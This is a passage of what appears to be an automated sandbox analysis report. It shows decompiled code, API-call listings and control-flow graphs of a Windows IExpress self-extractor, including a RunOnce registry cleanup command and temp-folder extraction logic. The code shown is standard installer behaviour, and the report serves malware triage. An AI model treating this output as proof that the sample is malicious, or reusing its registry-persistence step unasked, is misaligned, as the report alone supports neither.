                              				_push(_t86);
                              				_t87 = 0;
                              				while(1) {
                              					E00A7171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                              					_t95 = _t95 + 0x10;
                              					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                              					if(_t41 != 0) {
                              						break;
                              					}
                              					_t87 = _t87 + 1;
                              					if(_t87 < 0xc8) {
                              						continue;
                              					}
                              					break;
                              				}
                              				if(_t87 != 0xc8) {
                              					GetSystemDirectoryA( &_v528, _t84);
                              					_t79 = _t84;
                              					E00A7658A( &_v528, _t84, "advpack.dll");
                              					_t46 = LoadLibraryA( &_v528); // executed
                              					_t84 = _t46;
                              					if(_t84 == 0) {
                              						L10:
                              						if(GetModuleFileNameA( *0xa79a3c,  &_v268, 0x104) == 0) {
                              							L17:
                              							_t36 = RegCloseKey(_v532);
                              							L23:
                              							_pop(_t86);
                              							goto L24;
                              						}
                              						L11:
                              						_t72 =  &_v268;
                              						_t80 = _t72 + 1;
                              						do {
                              							_t49 =  *_t72;
                              							_t72 = _t72 + 1;
                              						} while (_t49 != 0);
                              						_t73 = _t72 - _t80;
                              						_t81 = 0xa791e4;
                              						do {
                              							_t50 =  *_t81;
                              							_t81 = _t81 + 1;
                              						} while (_t50 != 0);
                              						_t84 = _t73 + 0x50 + _t81 - 0xa791e5;
                              						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa791e5);
                              						if(_t90 != 0) {
                              							 *0xa78580 = _t66 ^ 0x00000001;
                              							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                              							if(_t66 == 0) {
                              								_t54 = "%s /D:%s";
                              							}
                              							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              							E00A7171E(_t90, _t84, _t54,  &_v268);
                              							_t75 = _t90;
                              							_t23 = _t75 + 1; // 0x1
                              							_t79 = _t23;
                              							do {
                              								_t56 =  *_t75;
                              								_t75 = _t75 + 1;
                              							} while (_t56 != 0);
                              							_t24 = _t75 - _t79 + 1; // 0x2
                              							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                              							RegCloseKey(_v532); // executed
                              							_t36 = LocalFree(_t90);
                              							goto L23;
                              						}
                              						_t79 = 0x4b5;
                              						E00A744B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                              						goto L17;
                              					}
                              					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                              					_t66 = 0 | _t91 != 0x00000000;
                              					FreeLibrary(_t84); // executed
                              					if(_t91 == 0) {
                              						goto L10;
                              					}
                              					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                              						E00A7658A( &_v268, 0x104, 0xa71140);
                              					}
                              					goto L11;
                              				}
                              				_t36 = RegCloseKey(_v532);
                              				 *0xa78530 = _t66;
                              				goto L23;
                              			}

































                              0x00a7202a
                              0x00a72035
                              0x00a7203c
                              0x00a72041
                              0x00a72050
                              0x00a7205f
                              0x00a72064
                              0x00a7206f
                              0x00a7208c
                              0x00a72094
                              0x00a72257
                              0x00a72266
                              0x00a72266
                              0x00a7209a
                              0x00a7209b
                              0x00a7209d
                              0x00a720aa
                              0x00a720af
                              0x00a720c9
                              0x00a720d1
                              0x00000000
                              0x00000000
                              0x00a720d3
                              0x00a720da
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a720da
                              0x00a720e2
                              0x00a72103
                              0x00a7210e
                              0x00a72116
                              0x00a72122
                              0x00a72128
                              0x00a7212c
                              0x00a72179
                              0x00a72194
                              0x00a721de
                              0x00a721e4
                              0x00a72256
                              0x00a72256
                              0x00000000
                              0x00a72256
                              0x00a72196
                              0x00a72196
                              0x00a7219c
                              0x00a7219f
                              0x00a7219f
                              0x00a721a1
                              0x00a721a2
                              0x00a721a6
                              0x00a721a8
                              0x00a721b0
                              0x00a721b0
                              0x00a721b2
                              0x00a721b3
                              0x00a721bc
                              0x00a721c7
                              0x00a721cb
                              0x00a721f1
                              0x00a721f6
                              0x00a721fd
                              0x00a721ff
                              0x00a721ff
                              0x00a72204
                              0x00a72213
                              0x00a72218
                              0x00a7221d
                              0x00a7221d
                              0x00a72220
                              0x00a72220
                              0x00a72222
                              0x00a72223
                              0x00a72229
                              0x00a7223d
                              0x00a72249
                              0x00a72250
                              0x00000000
                              0x00a72250
                              0x00a721d2
                              0x00a721d9
                              0x00000000
                              0x00a721d9
                              0x00a7213a
                              0x00a72141
                              0x00a72144
                              0x00a7214c
                              0x00000000
                              0x00000000
                              0x00a72163
                              0x00a72172
                              0x00a72172
                              0x00000000
                              0x00a72163
                              0x00a720ea
                              0x00a720f0
                              0x00000000

                              APIs
                              • memset.MSVCRT ref: 00A72050
                              • memset.MSVCRT ref: 00A7205F
                              • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A7208C
                                • Part of subcall function 00A7171E: _vsnprintf.MSVCRT ref: 00A71750
                              • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A720C9
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A720EA
                              • GetSystemDirectoryA.KERNEL32 ref: 00A72103
                              • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A72122
                              • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A72134
                              • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A72144
                              • GetSystemDirectoryA.KERNEL32 ref: 00A7215B
                              • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A7218C
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A721C1
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A721E4
                              • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A7223D
                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A72249
                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A72250
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                              • API String ID: 178549006-217856272
                              • Opcode ID: ea85b3032aba0309bb23e2fd54e04cc37353e49faacdcdba6453e0fa06a3a0cb
                              • Instruction ID: 8329a9c6ba4205f422b06ee3d849eb2d25f89bee0611d6234724bdea9fc366b8
                              • Opcode Fuzzy Hash: ea85b3032aba0309bb23e2fd54e04cc37353e49faacdcdba6453e0fa06a3a0cb
                              • Instruction Fuzzy Hash: 5451D571A40214BBDB20DB64DC4DFEB777CFB94700F00C6A8B94DE6151EA759E868BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 232 a755a0-a755d9 call a7468f LocalAlloc 235 a755fd-a7560c call a7468f 232->235 236 a755db-a755f1 call a744b9 call a76285 232->236 242 a75632-a75643 lstrcmpA 235->242 243 a7560e-a75630 call a744b9 LocalFree 235->243 250 a755f6-a755f8 236->250 244 a75645 242->244 245 a7564b-a75659 LocalFree 242->245 243->250 244->245 248 a75696-a7569c 245->248 249 a7565b-a7565d 245->249 255 a756a2-a756a8 248->255 256 a7589f-a758b5 call a76517 248->256 252 a7565f-a75667 249->252 253 a75669 249->253 254 a758b7-a758c7 call a76ce0 250->254 252->253 257 a7566b-a7567a call a75467 252->257 253->257 255->256 260 a756ae-a756c1 GetTempPathA 255->260 256->254 270 a75680-a75691 call a744b9 257->270 271 a7589b-a7589d 257->271 264 a756f3-a75711 call a71781 260->264 265 a756c3-a756c9 call a75467 260->265 275 a75717-a75729 GetDriveTypeA 264->275 276 a7586c-a75890 GetWindowsDirectoryA call a7597d 264->276 269 a756ce-a756d0 265->269 269->271 273 a756d6-a756df call a72630 269->273 270->250 271->254 273->264 286 a756e1-a756ed call a75467 273->286 280 a75730-a75740 GetFileAttributesA 275->280 281 a7572b-a7572e 275->281 276->264 287 a75896 276->287 284 a75742-a75745 280->284 285 a7577e-a7578f call a7597d 280->285 281->280 281->284 289 a75747-a7574f 284->289 290 a7576b 284->290 298 a757b2-a757bf call a72630 285->298 299 a75791-a7579e call a72630 285->299 286->264 286->271 287->271 291 a75771-a75779 289->291 292 a75751-a75753 289->292 290->291 296 a75864-a75866 291->296 292->291 295 a75755-a75762 call a76952 292->295 295->290 308 a75764-a75769 295->308 296->275 296->276 306 a757d3-a757f8 call a7658a GetFileAttributesA 298->306 307 a757c1-a757cd GetWindowsDirectoryA 298->307 299->290 309 a757a0-a757b0 call a7597d 299->309 314 a7580a 306->314 315 a757fa-a75808 CreateDirectoryA 306->315 307->306 308->285 308->290 309->290 309->298 316 a7580d-a7580f 314->316 315->316 317 a75827-a7585c SetFileAttributesA call a71781 call a75467 316->317 318 a75811-a75825 316->318 317->271 323 a7585e 317->323 318->296 323->296
                              C-Code - Quality: 92%
                              			E00A755A0(void* __eflags) {
                              				signed int _v8;
                              				char _v265;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t28;
                              				int _t32;
                              				int _t33;
                              				int _t35;
                              				signed int _t36;
                              				signed int _t38;
                              				int _t40;
                              				int _t44;
                              				long _t48;
                              				int _t49;
                              				int _t50;
                              				signed int _t53;
                              				int _t54;
                              				int _t59;
                              				char _t60;
                              				int _t65;
                              				char _t66;
                              				int _t67;
                              				int _t68;
                              				int _t69;
                              				int _t70;
                              				int _t71;
                              				struct _SECURITY_ATTRIBUTES* _t72;
                              				int _t73;
                              				CHAR* _t82;
                              				CHAR* _t88;
                              				void* _t103;
                              				signed int _t110;
                              
                              				_t28 =  *0xa78004; // 0x74742267
                              				_v8 = _t28 ^ _t110;
                              				_t2 = E00A7468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                              				_t109 = LocalAlloc(0x40, _t2);
                              				if(_t109 != 0) {
                              					_t82 = "RUNPROGRAM";
                              					_t32 = E00A7468F(_t82, _t109, 1);
                              					__eflags = _t32;
                              					if(_t32 != 0) {
                              						_t33 = lstrcmpA(_t109, "<None>");
                              						__eflags = _t33;
                              						if(_t33 == 0) {
                              							 *0xa79a30 = 1;
                              						}
                              						LocalFree(_t109);
                              						_t35 =  *0xa78b3e; // 0x0
                              						__eflags = _t35;
                              						if(_t35 == 0) {
                              							__eflags =  *0xa78a24; // 0x0
                              							if(__eflags != 0) {
                              								L46:
                              								_t101 = 0x7d2;
                              								_t36 = E00A76517(_t82, 0x7d2, 0, E00A73210, 0, 0);
                              								asm("sbb eax, eax");
                              								_t38 =  ~( ~_t36);
                              							} else {
                              								__eflags =  *0xa79a30; // 0x0
                              								if(__eflags != 0) {
                              									goto L46;
                              								} else {
                              									_t109 = 0xa791e4;
                              									_t40 = GetTempPathA(0x104, 0xa791e4);
                              									__eflags = _t40;
                              									if(_t40 == 0) {
                              										L19:
                              										_push(_t82);
                              										E00A71781( &_v268, 0x104, _t82, "A:\\");
                              										__eflags = _v268 - 0x5a;
                              										if(_v268 <= 0x5a) {
                              											do {
                              												_t109 = GetDriveTypeA( &_v268);
                              												__eflags = _t109 - 6;
                              												if(_t109 == 6) {
                              													L22:
                              													_t48 = GetFileAttributesA( &_v268);
                              													__eflags = _t48 - 0xffffffff;
                              													if(_t48 != 0xffffffff) {
                              														goto L30;
                              													} else {
                              														goto L23;
                              													}
                              												} else {
                              													__eflags = _t109 - 3;
                              													if(_t109 != 3) {
                              														L23:
                              														__eflags = _t109 - 2;
                              														if(_t109 != 2) {
                              															L28:
                              															_t66 = _v268;
                              															goto L29;
                              														} else {
                              															_t66 = _v268;
                              															__eflags = _t66 - 0x41;
                              															if(_t66 == 0x41) {
                              																L29:
                              																_t60 = _t66 + 1;
                              																_v268 = _t60;
                              																goto L42;
                              															} else {
                              																__eflags = _t66 - 0x42;
                              																if(_t66 == 0x42) {
                              																	goto L29;
                              																} else {
                              																	_t68 = E00A76952( &_v268);
                              																	__eflags = _t68;
                              																	if(_t68 == 0) {
                              																		goto L28;
                              																	} else {
                              																		__eflags = _t68 - 0x19000;
                              																		if(_t68 >= 0x19000) {
                              																			L30:
                              																			_push(0);
                              																			_t103 = 3;
                              																			_t49 = E00A7597D( &_v268, _t103, 1);
                              																			__eflags = _t49;
                              																			if(_t49 != 0) {
                              																				L33:
                              																				_t50 = E00A72630(0,  &_v268, 1);
                              																				__eflags = _t50;
                              																				if(_t50 != 0) {
                              																					GetWindowsDirectoryA( &_v268, 0x104);
                              																				}
                              																				_t88 =  &_v268;
                              																				E00A7658A(_t88, 0x104, "msdownld.tmp");
                              																				_t53 = GetFileAttributesA( &_v268);
                              																				__eflags = _t53 - 0xffffffff;
                              																				if(_t53 != 0xffffffff) {
                              																					_t54 = _t53 & 0x00000010;
                              																					__eflags = _t54;
                              																				} else {
                              																					_t54 = CreateDirectoryA( &_v268, 0);
                              																				}
                              																				__eflags = _t54;
                              																				if(_t54 != 0) {
                              																					SetFileAttributesA( &_v268, 2);
                              																					_push(_t88);
                              																					_t109 = 0xa791e4;
                              																					E00A71781(0xa791e4, 0x104, _t88,  &_v268);
                              																					_t101 = 1;
                              																					_t59 = E00A75467(0xa791e4, 1, 0);
                              																					__eflags = _t59;
                              																					if(_t59 != 0) {
                              																						goto L45;
                              																					} else {
                              																						_t60 = _v268;
                              																						goto L42;
                              																					}
                              																				} else {
                              																					_t60 = _v268 + 1;
                              																					_v265 = 0;
                              																					_v268 = _t60;
                              																					goto L42;
                              																				}
                              																			} else {
                              																				_t65 = E00A72630(0,  &_v268, 1);
                              																				__eflags = _t65;
                              																				if(_t65 != 0) {
                              																					goto L28;
                              																				} else {
                              																					_t67 = E00A7597D( &_v268, 1, 1, 0);
                              																					__eflags = _t67;
                              																					if(_t67 == 0) {
                              																						goto L28;
                              																					} else {
                              																						goto L33;
                              																					}
                              																				}
                              																			}
                              																		} else {
                              																			goto L28;
                              																		}
                              																	}
                              																}
                              															}
                              														}
                              													} else {
                              														goto L22;
                              													}
                              												}
                              												goto L47;
                              												L42:
                              												__eflags = _t60 - 0x5a;
                              											} while (_t60 <= 0x5a);
                              										}
                              										goto L43;
                              									} else {
                              										_t101 = 1;
                              										_t69 = E00A75467(0xa791e4, 1, 3); // executed
                              										__eflags = _t69;
                              										if(_t69 != 0) {
                              											goto L45;
                              										} else {
                              											_t82 = 0xa791e4;
                              											_t70 = E00A72630(0, 0xa791e4, 1);
                              											__eflags = _t70;
                              											if(_t70 != 0) {
                              												goto L19;
                              											} else {
                              												_t101 = 1;
                              												_t82 = 0xa791e4;
                              												_t71 = E00A75467(0xa791e4, 1, 1);
                              												__eflags = _t71;
                              												if(_t71 != 0) {
                              													goto L45;
                              												} else {
                              													do {
                              														goto L19;
                              														L43:
                              														GetWindowsDirectoryA( &_v268, 0x104);
                              														_push(4);
                              														_t101 = 3;
                              														_t82 =  &_v268;
                              														_t44 = E00A7597D(_t82, _t101, 1);
                              														__eflags = _t44;
                              													} while (_t44 != 0);
                              													goto L2;
                              												}
                              											}
                              										}
                              									}
                              								}
                              							}
                              						} else {
                              							__eflags = _t35 - 0x5c;
                              							if(_t35 != 0x5c) {
                              								L10:
                              								_t72 = 1;
                              							} else {
                              								__eflags =  *0xa78b3f - _t35; // 0x0
                              								_t72 = 0;
                              								if(__eflags != 0) {
                              									goto L10;
                              								}
                              							}
                              							_t101 = 0;
                              							_t73 = E00A75467(0xa78b3e, 0, _t72);
                              							__eflags = _t73;
                              							if(_t73 != 0) {
                              								L45:
                              								_t38 = 1;
                              							} else {
                              								_t101 = 0x4be;
                              								E00A744B9(0, 0x4be, 0, 0, 0x10, 0);
                              								goto L2;
                              							}
                              						}
                              					} else {
                              						_t101 = 0x4b1;
                              						E00A744B9(0, 0x4b1, 0, 0, 0x10, 0);
                              						LocalFree(_t109);
                              						 *0xa79124 = 0x80070714;
                              						goto L2;
                              					}
                              				} else {
                              					_t101 = 0x4b5;
                              					E00A744B9(0, 0x4b5, 0, 0, 0x10, 0);
                              					 *0xa79124 = E00A76285();
                              					L2:
                              					_t38 = 0;
                              				}
                              				L47:
                              				return E00A76CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                              			}





































                              0x00a755ab
                              0x00a755b2
                              0x00a755c9
                              0x00a755d5
                              0x00a755d9
                              0x00a75600
                              0x00a75605
                              0x00a7560a
                              0x00a7560c
                              0x00a75638
                              0x00a75641
                              0x00a75643
                              0x00a75645
                              0x00a75645
                              0x00a7564c
                              0x00a75652
                              0x00a75657
                              0x00a75659
                              0x00a75696
                              0x00a7569c
                              0x00a7589f
                              0x00a758a7
                              0x00a758ac
                              0x00a758b3
                              0x00a758b5
                              0x00a756a2
                              0x00a756a2
                              0x00a756a8
                              0x00000000
                              0x00a756ae
                              0x00a756ae
                              0x00a756b9
                              0x00a756bf
                              0x00a756c1
                              0x00a756f3
                              0x00a756f3
                              0x00a75705
                              0x00a7570a
                              0x00a75711
                              0x00a75717
                              0x00a75724
                              0x00a75726
                              0x00a75729
                              0x00a75730
                              0x00a75737
                              0x00a7573d
                              0x00a75740
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a7572b
                              0x00a7572b
                              0x00a7572e
                              0x00a75742
                              0x00a75742
                              0x00a75745
                              0x00a7576b
                              0x00a7576b
                              0x00000000
                              0x00a75747
                              0x00a75747
                              0x00a7574d
                              0x00a7574f
                              0x00a75771
                              0x00a75771
                              0x00a75773
                              0x00000000
                              0x00a75751
                              0x00a75751
                              0x00a75753
                              0x00000000
                              0x00a75755
                              0x00a7575b
                              0x00a75760
                              0x00a75762
                              0x00000000
                              0x00a75764
                              0x00a75764
                              0x00a75769
                              0x00a7577e
                              0x00a7577e
                              0x00a75781
                              0x00a75788
                              0x00a7578d
                              0x00a7578f
                              0x00a757b2
                              0x00a757b8
                              0x00a757bd
                              0x00a757bf
                              0x00a757cd
                              0x00a757cd
                              0x00a757dd
                              0x00a757e3
                              0x00a757ef
                              0x00a757f5
                              0x00a757f8
                              0x00a7580a
                              0x00a7580a
                              0x00a757fa
                              0x00a75802
                              0x00a75802
                              0x00a7580d
                              0x00a7580f
                              0x00a75830
                              0x00a75836
                              0x00a7583d
                              0x00a7584b
                              0x00a75851
                              0x00a75855
                              0x00a7585a
                              0x00a7585c
                              0x00000000
                              0x00a7585e
                              0x00a7585e
                              0x00000000
                              0x00a7585e
                              0x00a75811
                              0x00a75817
                              0x00a75819
                              0x00a7581f
                              0x00000000
                              0x00a7581f
                              0x00a75791
                              0x00a75797
                              0x00a7579c
                              0x00a7579e
                              0x00000000
                              0x00a757a0
                              0x00a757a9
                              0x00a757ae
                              0x00a757b0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a757b0
                              0x00a7579e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a75769
                              0x00a75762
                              0x00a75753
                              0x00a7574f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a7572e
                              0x00000000
                              0x00a75864
                              0x00a75864
                              0x00a75864
                              0x00a75717
                              0x00000000
                              0x00a756c3
                              0x00a756c5
                              0x00a756c9
                              0x00a756ce
                              0x00a756d0
                              0x00000000
                              0x00a756d6
                              0x00a756d6
                              0x00a756d8
                              0x00a756dd
                              0x00a756df
                              0x00000000
                              0x00a756e1
                              0x00a756e2
                              0x00a756e4
                              0x00a756e6
                              0x00a756eb
                              0x00a756ed
                              0x00000000
                              0x00a756f3
                              0x00a756f3
                              0x00000000
                              0x00a7586c
                              0x00a75878
                              0x00a7587e
                              0x00a75882
                              0x00a75883
                              0x00a75889
                              0x00a7588e
                              0x00a7588e
                              0x00000000
                              0x00a75896
                              0x00a756ed
                              0x00a756df
                              0x00a756d0
                              0x00a756c1
                              0x00a756a8
                              0x00a7565b
                              0x00a7565b
                              0x00a7565d
                              0x00a75669
                              0x00a75669
                              0x00a7565f
                              0x00a7565f
                              0x00a75665
                              0x00a75667
                              0x00000000
                              0x00000000
                              0x00a75667
                              0x00a7566c
                              0x00a75673
                              0x00a75678
                              0x00a7567a
                              0x00a7589b
                              0x00a7589b
                              0x00a75680
                              0x00a75685
                              0x00a7568c
                              0x00000000
                              0x00a7568c
                              0x00a7567a
                              0x00a7560e
                              0x00a75613
                              0x00a7561a
                              0x00a75620
                              0x00a75626
                              0x00000000
                              0x00a75626
                              0x00a755db
                              0x00a755e0
                              0x00a755e7
                              0x00a755f1
                              0x00a755f6
                              0x00a755f6
                              0x00a755f6
                              0x00a758b7
                              0x00a758c7

                              APIs
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A755CF
                              • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A75638
                              • LocalFree.KERNEL32(00000000), ref: 00A7564C
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A75620
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                                • Part of subcall function 00A76285: GetLastError.KERNEL32(00A75BBC), ref: 00A76285
                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A756B9
                              • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A7571E
                              • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A75737
                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A757CD
                              • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A757EF
                              • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A75802
                                • Part of subcall function 00A72630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A72654
                              • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A75830
                                • Part of subcall function 00A76517: FindResourceA.KERNEL32(00A70000,000007D6,00000005), ref: 00A7652A
                                • Part of subcall function 00A76517: LoadResource.KERNEL32(00A70000,00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A76538
                                • Part of subcall function 00A76517: DialogBoxIndirectParamA.USER32(00A70000,00000000,00000547,00A719E0,00000000), ref: 00A76557
                                • Part of subcall function 00A76517: FreeResource.KERNEL32(00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A76560
                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A75878
                                • Part of subcall function 00A7597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A759A8
                                • Part of subcall function 00A7597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A759AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                              • API String ID: 2436801531-1384155332
                              • Opcode ID: 33a3036e68bc32292296130f1f8dec8c9306028e49e5d8430e1f0a957d736651
                              • Instruction ID: 91bb6cb0e23d988b22111e84e8d26774d40ee67f2c5a8c879173b1813286d387
                              • Opcode Fuzzy Hash: 33a3036e68bc32292296130f1f8dec8c9306028e49e5d8430e1f0a957d736651
                              • Instruction Fuzzy Hash: C3810771E04A046BDB24ABB48D95BEE73ADEF60300F44C865F58ED2191EFF48DC28A51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 324 a7597d-a759b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a759dd-a75a1b GetDiskFreeSpaceA 324->325 326 a759bb-a759d8 call a744b9 call a76285 324->326 328 a75ba1-a75bde memset call a76285 GetLastError FormatMessageA 325->328 329 a75a21-a75a4a MulDiv 325->329 345 a75c05-a75c14 call a76ce0 326->345 337 a75be3-a75bfc call a744b9 SetCurrentDirectoryA 328->337 329->328 331 a75a50-a75a6c GetVolumeInformationA 329->331 334 a75ab5-a75aca SetCurrentDirectoryA 331->334 335 a75a6e-a75ab0 memset call a76285 GetLastError FormatMessageA 331->335 339 a75acc-a75ad1 334->339 335->337 351 a75c02 337->351 343 a75ad3-a75ad8 339->343 344 a75ae2-a75ae4 339->344 343->344 347 a75ada-a75ae0 343->347 349 a75ae7-a75af8 344->349 350 a75ae6 344->350 347->339 347->344 353 a75af9-a75afb 349->353 350->349 354 a75c04 351->354 355 a75b05-a75b08 353->355 356 a75afd-a75b03 353->356 354->345 357 a75b20-a75b27 355->357 358 a75b0a-a75b1b call a744b9 355->358 356->353 356->355 359 a75b52-a75b5b 357->359 360 a75b29-a75b33 357->360 358->351 364 a75b62-a75b6d 359->364 360->359 363 a75b35-a75b50 360->363 363->364 365 a75b76-a75b7d 364->365 366 a75b6f-a75b74 364->366 368 a75b83 365->368 369 a75b7f-a75b81 365->369 367 a75b85 366->367 370 a75b87-a75b94 call a7268b 367->370 371 a75b96-a75b9f 367->371 368->367 369->367 370->354 371->354
                              C-Code - Quality: 96%
                              			E00A7597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                              				signed int _v8;
                              				char _v16;
                              				char _v276;
                              				char _v788;
                              				long _v792;
                              				long _v796;
                              				long _v800;
                              				signed int _v804;
                              				long _v808;
                              				int _v812;
                              				long _v816;
                              				long _v820;
                              				void* __ebx;
                              				void* __esi;
                              				signed int _t46;
                              				int _t50;
                              				signed int _t55;
                              				void* _t66;
                              				int _t69;
                              				signed int _t73;
                              				signed short _t78;
                              				signed int _t87;
                              				signed int _t101;
                              				int _t102;
                              				unsigned int _t103;
                              				unsigned int _t105;
                              				signed int _t111;
                              				long _t112;
                              				signed int _t116;
                              				CHAR* _t118;
                              				signed int _t119;
                              				signed int _t120;
                              
                              				_t114 = __edi;
                              				_t46 =  *0xa78004; // 0x74742267
                              				_v8 = _t46 ^ _t120;
                              				_v804 = __edx;
                              				_t118 = __ecx;
                              				GetCurrentDirectoryA(0x104,  &_v276);
                              				_t50 = SetCurrentDirectoryA(_t118); // executed
                              				if(_t50 != 0) {
                              					_push(__edi);
                              					_v796 = 0;
                              					_v792 = 0;
                              					_v800 = 0;
                              					_v808 = 0;
                              					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                              					__eflags = _t55;
                              					if(_t55 == 0) {
